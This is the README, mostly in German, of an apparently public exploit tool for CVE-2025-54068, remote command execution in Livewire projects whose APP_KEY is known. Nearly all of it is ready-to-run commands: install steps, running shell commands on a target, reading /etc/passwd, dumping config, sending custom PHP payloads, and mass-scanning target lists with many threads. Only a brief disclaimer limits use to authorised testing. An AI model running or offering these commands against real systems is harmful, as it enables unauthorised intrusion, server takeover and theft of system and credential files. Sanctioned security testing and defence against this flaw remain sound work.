
A tool designed to exploit CVE-2025-54068 and Remote Command Execution of the Livewire project.
Ein Tool zur Ausnutzung von CVE-2025-54068 und Remote Command Execution, wenn der APP_KEY des Livewire-Projekts bekannt ist.
Dieses Tool ist eine neu codierte Version des ursprünglichen Projekts von Synacktiv:
Das Kernkonzept und die Methodik basieren auf der ursprünglichen Implementierung. Diese Version enthält kleinere Verbesserungen und zusätzliche Funktionen zur Steigerung von Benutzerfreundlichkeit und Flexibilität.
Installieren Sie das Tool mit pipx:
pipx install git+https://github.com/haxorstars/CVE-2025-54068
oder mit uv:
uv tool install git+https://github.com/haxorstars/CVE-2025-54068
Führen Sie das Tool gegen ein einzelnes Ziel aus:
livewire-rce-2025 -u target.com
Mit benutzerdefinierten Parametern:
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"
Führen Sie vordefinierte benutzerdefinierte Funktionen aus:
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"
Kombinieren Sie mehrere Funktionen in einem Befehl:
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
Verwenden Sie Ihre eigene PHP-Payload-Datei:
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"
Payload generieren, ohne sie an das Ziel zu senden:
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"
Oder unter Verwendung einer benutzerdefinierten PHP-Datei:
livewire-rce-2025 -generate-payload --custom-file custom.php
Scannen Sie mehrere Ziele aus einer Datei:
livewire-rce-2025 -mass-check targets.txt -o results.json
Mit benutzerdefinierter Thread-Anzahl:
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Viel Spaß beim Hacken😄